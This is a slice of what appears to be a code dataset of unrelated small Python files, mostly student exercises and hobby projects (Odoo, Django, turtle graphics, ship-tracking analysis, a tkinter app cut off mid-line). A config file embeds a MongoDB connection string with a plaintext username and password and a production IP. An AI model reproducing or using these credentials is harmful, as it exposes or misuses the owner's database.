onchange_partner_id_warning(self):\n        if not self.partner_id:\n            return\n        warning = {}\n        title = False\n        message = False\n        partner = self.partner_id\n\n        # If partner has no warning, check its company\n        if partner.sale_warn == 'no-message' and partner.parent_id:\n            partner = partner.parent_id\n\n        if partner.sale_warn != 'no-message':\n            # Block if partner only has warning but parent company is blocked\n            if partner.sale_warn != 'block' and partner.parent_id and partner.parent_id.sale_warn == 'block':\n                partner = partner.parent_id\n            title = (\"Warning for %s\") % partner.name\n            message = partner.sale_warn_msg\n            warning = {\n                'title': title,\n                'message': message,\n            }\n            if partner.sale_warn == 'block':\n                self.update({'partner_id': False, 'partner_invoice_id': False, 'partner_shipping_id': False, 'pricelist_id': False})\n            return {'warning': warning}\n\n        if warning:\n            return {'warning': warning}\n\n    order_line = fields.One2many('sale.order.line', 'order_id', string='Order Lines', copy=True)\n    name = fields.Char(string='Serial Number', copy=False, index=True, default=lambda self: _('New'))\n    sale_id = fields.Many2one('sale.order', string='SO Reference')\n    partner_id = fields.Many2one('res.partner', string='Customer')\n    # partner_invoice_id = fields.Many2one('res.partner', string='Invoice Address', readonly=True, required=True, help=\"Invoice address for current sales order.\")\n    # partner_shipping_id = fields.Many2one('res.partner', string='Delivery Address', readonly=True, required=True, help=\"Delivery address for current sales order.\")\n    date_order = fields.Datetime(string='Order Date', required=True, readonly=True, index=True, copy=False, default=fields.Datetime.now)\n    # validity_date = fields.Date(string='Expiration Date', readonly=True, copy=False ),\n    # payment_term_id = fields.Many2one('account.payment.term', string='Payment Terms', oldname='payment_term')\n\n    @api.model\n    def create(self, values):\n        seq = self.env['ir.sequence'].get('sale.quotation') \n        values['name'] = seq\n        result = super(SaleQuotation, self).create(values)\n        return 
result","sub_path":"bt_sales_warranty/models/sale_quotation.py","file_name":"sale_quotation.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"464289472","text":"inp=input(\"Enter the name of the file: \")\r\ntry:\r\n    fh=open(inp)\r\nexcept:\r\n    print(\"File does not exist\")\r\n    quit()\r\ncount=0\r\nfor line in fh:\r\n    line=line.strip()\r\n    if not line.startswith('From '):\r\n        continue\r\n    count=count+1\r\n    word=line.split()\r\n    print(word[1])\r\n\r\nprint(\"There were {} lines with From as the first word\".format(count))","sub_path":"emails.py","file_name":"emails.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"489335019","text":"import turtle\nclass LSystem:\n\tdef __init__(self, axiom, rules=None):\n\t\tself.axiom = axiom\n\t\tself.rules_map = rules if rules is not None else {} #grammar productions, e.g. {'x': 'f-x+x'}\n\t\tself.result = \"\"\n\t\tself.iterations = 5 #you can either set them to 0 or a default value and change it later\n\t\tself.distance = 10\n\t\tself.angle = 90\n\n\tdef createLSystem(self):\n\t\tself.result = self.axiom #you have to do this or you’ll overwrite the OG value\n\t\tfor i in range(self.iterations):\n\t\t\tnewStr = \"\"\n\t\t\tfor c in self.result:\n\t\t\t\tnewStr += self.rules(c)\n\t\t\tself.result = newStr\n\n\t#######################################################\n\t#This function is different than our original lsystem\n\t#It was made into one line using a dictionary\n\t#######################################################\n\tdef rules(self, ch):\n\t\treturn self.rules_map.get(ch, ch) #The second ch returns the char itself if it's not found in the dictionary\n\n\tdef drawLSystem(self):\n\t\tt = turtle.Turtle()\n\t\twn = turtle.Screen()\n\t\tfor ch in self.result:\n\t\t\tif(ch == \"f\"):\n\t\t\t\tt.forward(self.distance)\n\t\t\telif(ch == \"x\"):\n\t\t\t\tt.right(self.angle)\n\t\t\telif(ch == \"y\"):\n\t\t\t\tt.left(self.angle)\n\t\twn.exitonclick()\n\n\n\n\tdef __str__(self):\n\t\treturn self.result\n\n\n\ndef main():\n\trules = {'x':'f-x+x'}\n\tLs = LSystem('fx', rules)\n\tLs.createLSystem()\n\tLs.drawLSystem()\n\n\nmain()\n","sub_path":"cs110/notes/lsystem-dictionary.py","file_name":"lsystem-dictionary.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"312591997","text":"import sys\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nmatplotlib.rc('font', size=16)\n\nfor file in sys.argv[1:-1]:\n\txs = []\n\tys = []\n\tsigmas = []\n\t\n\tdata = open(file, \"r\")\n\tfor line in data:\n\t\tx, y = line.split()\n\t\txs.append(float(x))\n\t\tys.append(float(y))\n\t\t#sigmas.append(float(sigma))\n\tdata.close()\n\n\ttry:\n\t\tplt.errorbar(xs, ys, fmt=\"o\", label=file.split('/')[-2])\n\texcept IndexError:\n\t\tplt.errorbar(xs, ys, fmt=\"o\")\n\nplt.xscale(\"log\")\nplt.yscale(\"log\")\n\nplt.legend()\n\nplt.savefig(sys.argv[-1])\nplt.close()\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"425951182","text":"\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\n\nfrom .models import Habit, HabitRecord\nfrom .forms import HabitForm, HabitRecordForm\n\n\n\ndef habit_list(request):\n    habits = Habit.objects.all()\n    return render(request, 'habit_tracker/habit_list.html', {'habits': habits})\n\n\n# 
There might be some naming mismatch; you can change whatever you need\n\ndef habit_detail(request, pk):\n    habit = Habit.objects.get(pk=pk)\n    return render(request, 'habit_tracker/habit_detail.html', {\"habit\": habit, \"pk\": pk})\n\n\ndef habit_new(request):\n    if request.method == 'POST':\n        form = HabitForm(request.POST)\n        if form.is_valid():\n            habit = form.save()\n            return redirect('habit_detail', pk=habit.pk)\n    else:\n        form = HabitForm()\n\n    return render(request, 'habit_tracker/habit_new.html', {\"form\": form})\n\ndef record_new(request, pk):\n    if request.method == 'POST':\n        form = HabitRecordForm(request.POST)\n        if form.is_valid():\n            record = form.save()\n            return redirect('habit_detail', pk = pk)\n    else: \n        form = HabitRecordForm()\n\n    return render(request, 'habit_tracker/record_new.html', {\"form\": form})\n\n\ndef record_edit(request, pk):\n    record = get_object_or_404(HabitRecord)\n    if request.method == 'POST':\n        form = HabitRecordForm(request.POST, instance=record)\n        if form.is_valid():\n            form.save()\n            return redirect('habit_detail', pk = pk)\n    else:\n        form = HabitRecordForm(instance=record)\n    \n    return render(request, 'habit_tracker/record_edit.html', {\"form\": form})\n\ndef habit_delete(request, pk):\n    habit = get_object_or_404(Habit, pk=pk)\n    habit.delete()\n    return redirect('habit_list')\n\ndef calendar(request):\n    return render(request, 'habit_tracker/calendar.html')","sub_path":"habit_tracker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"357385683","text":"# File Name: crypto_project_3.py\n# How to decode a hex xor\n\nimport binascii\n\n\ndef main():\n    xor_string = '1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736'\n    secret_code = binascii.unhexlify(xor_string)\n    strings = (''.join(chr(num ^ key) for num in secret_code) for key in range(256))\n    print(max(strings, key=fun))\n\n\ndef fun(answer):\n    return answer.count(' ')\n\n\nmain()\n","sub_path":"Python Programming/cryptography/crypto_project_3.py","file_name":"crypto_project_3.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"139055791","text":"# linked_list.py\n# Code to solve problem #4 for the Python Challenge, which can be found at pythonchallenge.com\n# Sean Brickley (October 11th, 2016)\n\nimport re\nimport urllib.request\n\nnothing = '12345'\nwhile True:\n    print('getting {}'.format(nothing))\n    url = 'http://www.pythonchallenge.com/pc/def/linkedlist.php?nothing={}'.format(nothing)\n    html = urllib.request.urlopen(url).read().decode('utf-8')\n    m = re.search(r'and the next nothing is (\\d+)', html)\n    if not m:\n        print('found a page that does not match: {}'.format(html))\n        break\n    nothing = m.group(1)\n\n","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"312276434","text":"import os\n\nclass ToolBelt:\n    #Get matches for the pattern within the file list\n    def getMatches(self, filename, pattern):\n        with open(os.getcwd()+'/textfiles/'+filename) as f:\n            contents = f.read()\n            matches = pattern.finditer(contents)\n        return matches\n\n    def printMatches(self, matches):\n        for match in matches:\n            print(match.group(1))\n\n    def createMasterList(self, matches):\n        temp = []\n        masterList = []\n        for found 
in matches:\n            if found.group(1) is not None:\n                temp.append(found.group(1))\n            if found.group(1) is None:\n                masterList.append(temp.copy())\n                temp.clear()\n        return masterList \n","sub_path":"Python/CC - Compare Backend/Backend/FileSearcher.py","file_name":"FileSearcher.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"498784667","text":"import pandas as pd\nfrom geopy.distance import great_circle\nimport datetime\nfrom itertools import combinations\nfrom Submission.functions import haversine, filter_df, box_intervals, time_overlap\n\ndf_file = '../Data/AIS_2017_12_Zone11.csv'\n\n# Rebuilds the dataframe from the chunks\ndf = pd.read_csv(df_file)\nprint('File read.', df.shape)\n\ndf = filter_df(df)\n\ndate_min = df.Date.min() # start date\ndate_max = df.Date.max() # end date\n\ndelta = date_max - date_min # timedelta\n\ndates = []\nfor i in range(delta.days + 1):\n    dates.append(date_min + datetime.timedelta(i))\n\nfor date in dates:\n    date_start_time = datetime.datetime.now()\n    print(date)\n    df_date = df[(df.Date >= date) & (df.Date < date+datetime.timedelta(1))]\n\n    intervals = box_intervals(df_date)\n\n    num_boxes = len(intervals['lat']) * len(intervals['lon'])\n    print('Number of boxes:', num_boxes)\n    boxes_checked = 0\n\n    ship_combos_checked = set()\n    ships_interactions = 0\n    # Loop through each sub-box\n    for lat_i, temp_box_lat in enumerate(intervals['lat']):\n        for lon_i, temp_box_lon in enumerate(intervals['lon']):\n            boxes_checked = boxes_checked + 1\n            if boxes_checked % 1000 == 0:\n                print('Boxes checked:', boxes_checked)\n                print('Total ships comparisons for this day:', len(ship_combos_checked))\n                print('Total ship interactions for this day:', ships_interactions)\n            # Don't loop through end of box\n            if (lat_i < len(intervals['lat']) - 3) & (lon_i < len(intervals['lon']) - 3):\n                # print('Starting box', temp_box_lat, temp_box_lon)\n                interactions = pd.DataFrame()  # note: placeholder, not used below\n                # Get all data within box\n                df_box = df_date[(df_date.LAT >= temp_box_lat)&(df_date.LAT <= intervals['lat'][lat_i+2])&(df_date.LON >= temp_box_lon)&(df_date.LON <= intervals['lon'][lon_i+2])]\n                # Get ids of all ships that existed in the box\n                ships = list(set(df_box.MMSI.tolist()))\n                # If more than 1 ship\n                if ships is not None and len(ships) > 1:\n                    ships.sort()\n                    # Create all combinations of ships that haven't been checked yet\n                    ship_combinations = set(list(combinations(ships, 2))) # 2 for pairs, 3 for triplets, etc\n                    ship_combinations = ship_combinations - ship_combos_checked\n                    for combo in ship_combinations:\n                        # Check for time overlap\n                        if time_overlap((df_box.BaseDateTime[df_box.MMSI == combo[0]].min(), df_box.BaseDateTime[df_box.MMSI == combo[0]].max()), (df_box.BaseDateTime[df_box.MMSI == combo[1]].min(), df_box.BaseDateTime[df_box.MMSI == combo[1]].max())):\n                            # Check distance between ships\n                            ship_combos_checked.add(combo)\n                            distance = great_circle((df_box.LAT[df_box.MMSI == combo[0]].iloc[0], df_box.LON[df_box.MMSI == combo[0]].iloc[0]), (df_box.LAT[df_box.MMSI == combo[1]].iloc[0], df_box.LON[df_box.MMSI == combo[1]].iloc[0])).feet / 3\n                            if distance <= 8000:\n                                ships_interactions = ships_interactions + 1\n    date_end_time = datetime.datetime.now()\n    time_delta = date_end_time - date_start_time\n    print('Time to process:', time_delta.seconds / 60, 
'minutes')\n","sub_path":"Submission/TeamBlueDots/Preprocessing_filter1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"89805747","text":"# 1. The Bedroom object has the following attributes:\n# • length: length of the room in feet\n# • breadth: breadth of the room in feet\n# • height: breadth of the room in feet\n# • bed: an object representing the bed in the bedroom. Initialize as None.\n# • closet: an object representing the closet in the bedroom. Initialize as None.\n# • has_balcony: True or False depending on whether the room has a balcony or not\n# • has_window: True or False depending on whether the room has a window or not\n# • num_lights: The number of lights/lightsockets in the number\n# • has_ac: True or False depending on whether the room has a window or not\n# • has_fan: True or False depending on whether the room has a window or not\n# • num_charging_points: Number of charging points in the room.\n\n\n\n# 2. The Bedroom object has the following methods:\n\n# • carpet_area(): Returns the carpet area of the room which is calculated as length*breadth\n\n# • add_bed(): creates a Bed object using user inputs [using input() function] and assigns it to the bed attribute of the bedroom. While adding a bed make sure the dimensions of the bed are suitable for the remaining carpet area in the room.\n\n# For example: you cannot add a 9x9 bed in a 8X10 bedroom\n# For example 2: you cannot add a 6x3 bed in a 8x10 bedroom if there is already a closet which takes up 60 sq ft space.\n\n# • add_closet(): creates a Closet object using user inputs [using input() function] and assigns it to the closet attribute of the bedroom. While adding a close make sure the dimensions of the closet are suitable for the remaining carpet area in the room.\n\n# For example: you cannot add a 9x9 closet in a 8X10 bedroom\n# For example 2: you cannot add a 6x3 closet in a 8x10 bedroom if there is already a bed which takes up 60 sq ft space.\n\n# • remove_bed(): Checks if the bed attribute is None. If not, then makes it None and returns “bed removed from the room”. If bed attribute is already None, then it returns “No bed found in the room”.\n\n# • remove_closet(): Checks if the closet attribute is None. If not, then makes it None and returns “closet removed from the room”. 
If closet attribute is already None, then it returns “No closet found in the room”.\n\n\n\n\nfrom bed import Bed\nfrom closet import Closet\n\n\nclass Bedroom:\n    def __init__(self, length, breadth, height, bed, closet, has_balcony, has_window, num_lights, has_ac, has_fan, num_charging_points):\n        self.length = int(length)\n        self.breadth = int(breadth)\n        self.height = height\n        self.bed = None\n        self.closet = None\n        self.has_balcony = has_balcony\n        self.has_window = has_window\n        self.num_lights = num_lights\n        self.has_ac = has_ac\n        self.has_fan = has_fan\n        self.num_charging_points = num_charging_points\n\n\n\n    def carpet_area(self):\n        return (self.length * self.breadth)\n\n\n    def add_bed(self):\n\n        length = input('len of bed: ')\n        bre = input('breadth of bed: ')\n        year = input('enter the year made: ')\n        posts = input('has posts?: ')\n        headboard = input('has head board?: ')\n        material = input('material: ')\n\n        self.bed = Bed(length, bre, year, posts, headboard, material)\n\n    \n    def add_closet(self):\n\n        length = input('length: ')\n        breadth = input('breadth: ')\n        height = input('height: ')\n        max_capacity = input('max_capacity: ')\n        items = input('items: ')\n\n        self.closet = Closet(length, breadth, height, max_capacity, items)\n    \n\n    \n    def remove_bed(self):\n\n        if self.bed != None:\n            self.bed = None\n            print(\"bed removed from the room\") \n        elif self.bed == None:\n            print(\"No bed found in the room\")\n    \n\n\n    def remove_closet(self):\n        if self.closet != None:\n            self.closet = None\n            print(\"closet removed from the room\") \n        elif self.closet == None:\n            print(\"No closet found in the room\")\n\n\nb_rm = Bedroom(44, 55, 66, None, 11, True, True, 14, True, False, 2)\n\n# print(b_rm.length)\n# print(b_rm.breadth)\n# print(b_rm.height)\n# print(b_rm.bed)\n# print(b_rm.closet)\n# print(b_rm.has_balcony)\n# print(b_rm.has_window)\n# print(b_rm.num_lights)\n# print(b_rm.has_ac)\n# print(b_rm.has_fan)\n# print(b_rm.num_charging_points)\n\n# result1 = b_rm.carpet_area()\n# print(f\"carpet area of the room is \", result1)\n# b_rm.add_bed()\n# b_rm.add_closet()\n# b_rm.remove_bed()\n# b_rm.remove_closet()\n","sub_path":"coding-challenges/week05/day02/apartment/bedroom.py","file_name":"bedroom.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"57191319","text":"from seeder import Seeder\n\nimport random\n\nfrom datetime import datetime, timedelta\n\n\nclass DateTimeSeeder(Seeder):\n    \"\"\"\n    Class initialized with instance object and\n    DateTime field along with options:\n\n    + past_only =>\n        (defaults to False) if True field will be a past datetime.\n\n    + future_only =>\n        (defaults to False) if True field will be a future datetime.\n\n    + default =>\n        (defaults to False) if anything other than False datetime will be\n        the provided value even if the provided value is not a valid\n        DateTime object.\n    \"\"\"\n\n    def __init__(self, instance, field_name,\n                 past_only=False, future_only=False, default=False,\n                 months=0, weeks=0, days=0, hours=0, minutes=0, seconds=0,\n                 milliseconds=0, microseconds=0, *args, **kwargs):\n\n        super(DateTimeSeeder, self)\\\n            .__init__(instance, field_name, *args, **kwargs)\n\n        self.past_only = past_only\n        self.future_only = future_only\n        self.default = default\n\n        self.weeks = weeks\n        self.days = days\n        self.hours = hours\n        self.minutes = minutes\n        self.seconds = seconds\n        self.microseconds = microseconds\n        self.milliseconds = milliseconds\n\n        self.generate_time_key()\n        
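# Added note (sketch, not part of the original file): the two calls here\n        # turn the keyword offsets into a timedelta; all-zero offsets fall back\n        # to a random span of up to one year (see generate_time_diff below).\n        # Hypothetical usage, assuming a model instance `user`:\n        #   DateTimeSeeder(user, 'created_at', past_only=True, days=30).generate_value()\n        # returns a datetime exactly 30 days in the past.\n        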
self.generate_time_diff()\n\n\n def dict(self):\n return {\n 'weeks' :self.weeks,\n 'days' :self.days,\n 'hours' :self.hours,\n 'minutes' :self.minutes,\n 'seconds' :self.seconds,\n 'milliseconds' :self.milliseconds,\n 'microseconds' :self.microseconds,\n }\n\n def generate_time_key(self):\n self.time_key = (\n self.weeks,\n self.days,\n self.hours,\n self.minutes,\n self.seconds,\n self.milliseconds,\n self.microseconds,\n )\n def generate_time_diff(self):\n #imperative nothing.\n time_dict = {\n (0,0,0,0,0,0,0): timedelta(days=random.uniform(0,365))\n }\n self.time_diff = time_dict.get(\n self.time_key,\n timedelta(**self.dict())\n )\n\n def now(self):\n return datetime.utcnow()\n\n def past(self):\n return self.now() - self.time_diff\n\n def future(self):\n return self.now() + self.time_diff\n\n def generate_value(self):\n if self.default != False:\n return self.default\n elif self.past_only == True:\n return self.past()\n elif self.future_only == True:\n return self.future()\n else:\n return random.choice([self.past, self.future])()\n","sub_path":"flask_db_seeder/seeders/datetime_seeder.py","file_name":"datetime_seeder.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"588215859","text":"import copy\nimport sys\nimport operator\n\n\nclass Graph:\n def __init__(self, graph):\n self.t = -1 # finishing time\n self.s = 0 # leaders\n self.exploded = [False] * len(graph)\n self.graph = copy.deepcopy(graph)\n self.finishing_times = [None] * len(self.graph)\n self.leaders = {}\n self.reverse_graph = []\n\n def __str__(self):\n return str(self.exploded)\n # return out\n\n def make_revere_graph(self):\n reverse_graph = [[] for x in range(len(self.graph))]\n for node, _ in enumerate(self.graph):\n for edge in self.graph[node]:\n reverse_graph[edge].append(node)\n self.reverse_graph = reverse_graph\n\n def make_finishing_times(self):\n self.make_revere_graph()\n for node in reversed(range(len(self.reverse_graph))):\n if not self.exploded[node]:\n self.dfs1(node)\n self.exploded = [False] * len(self.graph)\n\n def get_strongly_connected_comp_by_leaders(self):\n for node in reversed(self.finishing_times):\n if not self.exploded[node]:\n self.s = node\n self.dfs2(node)\n self.exploded = [False] * len(self.graph)\n\n def dfs2(self, node):\n self.exploded[node] = True\n\n if self.s in self.leaders:\n self.leaders[self.s] += 1\n else:\n self.leaders[self.s] = 1\n\n for adj_node in self.graph[node]:\n if not self.exploded[adj_node]:\n self.dfs2(adj_node)\n\n def print_reserve_graph(self):\n print(self.finishing_times)\n\n def dfs1(self, node):\n self.exploded[node] = True\n for adj_node in self.reverse_graph[node]:\n if not self.exploded[adj_node]:\n self.dfs1(adj_node)\n self.t += 1\n self.finishing_times[self.t] = node\n\n def get_sorted_leaders(self, quantity=0, order=\"DESC\"):\n sorted_leaders = sorted(self.leaders.items(), key=operator.itemgetter(1), reverse=order == \"DESC\")\n\n if quantity and quantity < len(sorted_leaders):\n return sorted_leaders[:quantity]\n else:\n return sorted_leaders\n\n\ndef make_graph_from_txt(txt):\n out_dict = {}\n file = open(txt, 'r')\n nodes_quantity = 0\n for ln in file:\n node_head = int(ln.split()[1]) - 1\n node_tail = int(ln.split()[0]) - 1\n if node_head > nodes_quantity:\n nodes_quantity = node_head\n if node_tail > nodes_quantity:\n nodes_quantity = node_tail\n if node_tail in out_dict:\n out_dict[node_tail].append(node_head)\n else:\n out_dict[node_tail] = 
[node_head]\n\n out = [[] for x in range(nodes_quantity + 1)]\n for node in out_dict:\n out[node] = out_dict[node]\n\n file.close()\n return out\n\n\ndef main():\n gr = Graph([\n [3],\n [7],\n [5],\n [6],\n [1],\n [8],\n [0],\n [5, 4],\n [6, 2]\n ])\n\n gr.make_revere_graph()\n gr.make_finishing_times()\n gr.get_strongly_connected_comp_by_leaders()\n print(gr.leaders)\n\n\n # graph_init = make_graph_from_txt('h:\\\\_410e934e6553ac56409b2cb7096a44aa_SCC.txt')\n # graph = Graph(graph_init)\n # graph.make_revere_graph()\n # graph.make_finishing_times()\n # graph.get_strongly_connected_comp()\n\n\nif __name__ == '__main__':\n sys.setrecursionlimit(500000)\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156455897","text":"PRODUCTION = False\nTEST_DB_URI = 'mongodb://elc:yak@ds047652.mongolab.com:47652/redditdump'\nTEST_DB_NAME = 'redditdump'\nPROD_HOST = '45.55.235.216'\nPROD_PORT = 27017\nSUBREDDITS = [\n {'name': 'McGill University', 'subreddit': 'mcgill'},\n {'name': 'Georgia Tech', 'subreddit': 'gatech'},\n {'name': 'UT Austin', 'subreddit': 'UTAustin'},\n {'name': 'Penn State University', 'subreddit': 'PennStateUniversity'},\n {'name': 'Purdue', 'subreddit': 'purdue'},\n {'name': 'UC Berkeley', 'subreddit': 'berkeley'},\n {'name': 'CalPoly Ubispo', 'subreddit': 'CalPoly'},\n {'name': 'UC Santa Barbara', 'subreddit': 'ucsantabarbara'},\n {'name': 'North Carolina State University', 'subreddit': 'ncsu'},\n {'name': 'York University', 'subreddit': 'yorku'},\n {'name': 'Texas A&M', 'subreddit': 'aggies'},\n {'name': 'Arizona State University', 'subreddit': 'asu'},\n {'name': 'University of Central Florida', 'subreddit': 'ucf'},\n {'name': 'University of British Columbia', 'subreddit': 'UBC'},\n {'name': 'University of Maryland', 'subreddit': 'UMD'},\n {'name': 'Rochester Institute of Technology', 'subreddit': 'rit'},\n {'name': 'Ohio State University', 'subreddit': 'OSU'},\n {'name': 'UC San Diego', 'subreddit': 'ucsd'},\n {'name': 'University of Missouri', 'subreddit': 'mizzou'},\n {'name': 'University of Georgia', 'subreddit': 'UGA'}\n ]\n\n","sub_path":"server/collection/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"440387848","text":"\"\"\"\n@copyright: (c)Copyright 2013, Intel Corporation All Rights Reserved.\nThe source code contained or described here in and all documents related\nto the source code (\"Material\") are owned by Intel Corporation or its\nsuppliers or licensors. Title to the Material remains with Intel Corporation\nor its suppliers and licensors. The Material contains trade secrets and\nproprietary and confidential information of Intel or its suppliers and\nlicensors.\n\nThe Material is protected by worldwide copyright and trade secret laws and\ntreaty provisions. No part of the Material may be used, copied, reproduced,\nmodified, published, uploaded, posted, transmitted, distributed, or disclosed\nin any way without Intel's prior express written permission.\n\nNo license under any patent, copyright, trade secret or other intellectual\nproperty right is granted to or conferred upon you by disclosure or delivery\nof the Materials, either expressly, by implication, inducement, estoppel or\notherwise. 
Any license under such intellectual property rights must be express\nand approved by Intel in writing.\n\n@organization: INTEL MCG PSI\n@summary: This file implements the reboot from MOS to MOS UC\n@since: 03/03/2014\n@author: Chenghua Yang\n\"\"\"\n\nfrom UtilitiesFWK.Utilities import Global\nfrom acs_test_scripts.UseCase.UseCaseBase import UseCaseBase\nimport time\n\n\nclass LabDutRebootWhenMbOff(UseCaseBase):\n\n \"\"\"\n This Use Case reboots the DUT when Radio OFF (mobile broadband off)\n \"\"\"\n\n def __init__(self, tc_name, global_config):\n \"\"\"\n Constructor\n \"\"\"\n\n # Call UseCase base Init function\n UseCaseBase.__init__(self, tc_name, global_config)\n\n # Get UECmdLayer for Data Use Cases\n self._networking_api = self._device.get_uecmd(\"Networking\")\n self._modem_api = self._device.get_uecmd(\"Modem\")\n\n # Initialize some attributes\n self._boot_timeout = None\n self._settledown_duration = None\n\n # Get bootTimeout value either from parameter file or\n # default value from phone catalog\n if self._tc_parameters.get_param_value(\"BOOT_TIMEOUT\") != \"\":\n self._boot_timeout = \\\n int(self._tc_parameters.get_param_value(\"BOOT_TIMEOUT\"))\n\n # Get settledown duration value either from parameter file or\n # default value from phone catalog\n if self._tc_parameters.get_param_value(\"SETTLEDOWN_DURATION\") != \"\":\n self._settledown_duration = \\\n int(self._tc_parameters.get_param_value(\"SETTLEDOWN_DURATION\"))\n\n # Get UECmdLayer for Data Use Cases\n self._modem_api = self._device.get_uecmd(\"Modem\")\n\n#------------------------------------------------------------------------------\n\n def run_test(self):\n \"\"\"\n Execute the test\n \"\"\"\n\n # Run UC base run_test\n UseCaseBase.run_test(self)\n\n # Initialize the return code and message of the test\n return_code = Global.FAILURE\n return_message = \"An error occurred.\"\n\n # turn off mobile broadband\n self._networking_api.reset_mobile_broadband_mode(0)\n\n time.sleep(5)\n mode_before_reboot = str(self._modem_api.get_modem_power_status())\n self._logger.info (\"Starting reboot - Mobile Broadband before reboot is %s\" % mode_before_reboot)\n\n # Restart the phone in MOS\n rebooted = self._device.reboot(self._settledown_duration )\n if rebooted:\n return_code = Global.SUCCESS\n return_message = \"Board rebooted successfully.\"\n else:\n return_code = Global.FAILURE\n return_message = \"An error occurred when rebooting the board.\"\n\n self._logger.info(\"Start To Detect Modom connection\")\n result = self._modem_api.detect_modem_connection()\n if result == True :\n self._logger.info( \"Modem is connected and ready to use\" )\n else:\n self._logger.info( \"There is no modem connected\" )\n return_code = Global.FAILURE\n return_message = \"Board was not rebooted properly.\"\n return return_code, return_message\n\n # check if the mobile broadband stays off after reboot\n current_mode = str(self._modem_api.get_modem_power_status())\n if mode_before_reboot == current_mode:\n self._logger.info (\"Mobile Broadband before reboot is %s and after reboot is %s\" % (mode_before_reboot, current_mode) )\n return_code = Global.SUCCESS\n return_message = \"Board rebooted successfully and Mobile Broadband before reboot is %s and after reboot is %s\" % (mode_before_reboot, current_mode)\n\n # Return the verdict and the message\n return return_code, 
return_message\n","sub_path":"ACS_v.18.20.4_1/ACS/acs_test_scripts/UseCase/System/LAB_DUT_REBOOT_WHEN_MB_OFF.py","file_name":"LAB_DUT_REBOOT_WHEN_MB_OFF.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"577378222","text":"from .models import OpinionTable\nfrom accounts.person_controller import Usuario\nfrom calificaciones.calificacion_controller import Calificacion\nfrom lugares.lugar_controller import Lugar\n\n\nclass Opinion(Calificacion):\n def __init__(self, lugar, persona):\n self._lugar = lugar\n self._persona = persona\n # lugar_obj = Lugar()\n # self._lugar = lugar_obj.buscar_lugar(lugar_id)\n\n # persona_obj = Usuario()\n # self._usuario = persona_obj.search_client(persona_id)\n\n def agregar_opinion(self, opinion_description):\n opinion = OpinionTable(\n descripcion_opinion=opinion_description,\n lugar=self._lugar,\n usuario=self._usuario\n )\n opinion.save()\n\n def calificar(self, id_opinion, score):\n\n opinion = OpinionTable.objects.get(id=id_opinion)\n actual_score = opinion.puntaje\n\n opinion.puntaje = actual_score + score if actual_score + score > 0 else 0\n\n calificaciones = OpinionTable.objects.filter(tipo_calificacion='usuario')\n\n for calificacion in calificaciones:\n if calificacion.min_puntaje < opinion.puntaje <= calificacion.max_puntaje:\n opinion.calificacion = calificacion\n break\n\n opinion.save()\n\n\n\n\n\n\n\n","sub_path":"poo/opiniones/opinion.py","file_name":"opinion.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"141456652","text":"def f(a, b, c):\n return (b + c * a) * a \n\n# List of dicts with each dict containing named arguments.\nINPUTS = [{\"a\": a, \"b\": b, \"c\": c} for a, b, c in zip(list(range(30)), list(range(30, 60)), list(range(60, 90)))]\nOUTPUTS = [f(**item) for item in INPUTS]\n\nMAX_EXPR_ELEMENTS = 30\nMAX_GENERATIONS = 500\nMAX_POPULATION = 150\nCONSTANTS = {} #{\"PI\": 3.14} # Ephemeral constant, evaluated at call time, name to value\nfrom operator import truediv, mul, add, sub\nFUNCTIONS = [truediv, mul, add, sub]\n\n# Between 1 and 0\n# For all inputs to all outputs\nfrom statistics import normalize\ndef validate(predicted, actual, OUTPUTS):\n worst = max(OUTPUTS)\n return normalize(value=abs(predicted - actual), minimum=0, maximum=worst)\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116649181","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom csv_scraper import acquire_data\n\nclass MainApp(tk.Tk):\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n self.title(\"Fantasy Football App\")\n\n mainframe = tk.Frame(self)\n mainframe.pack(side = \"top\", fill = \"both\", expand = 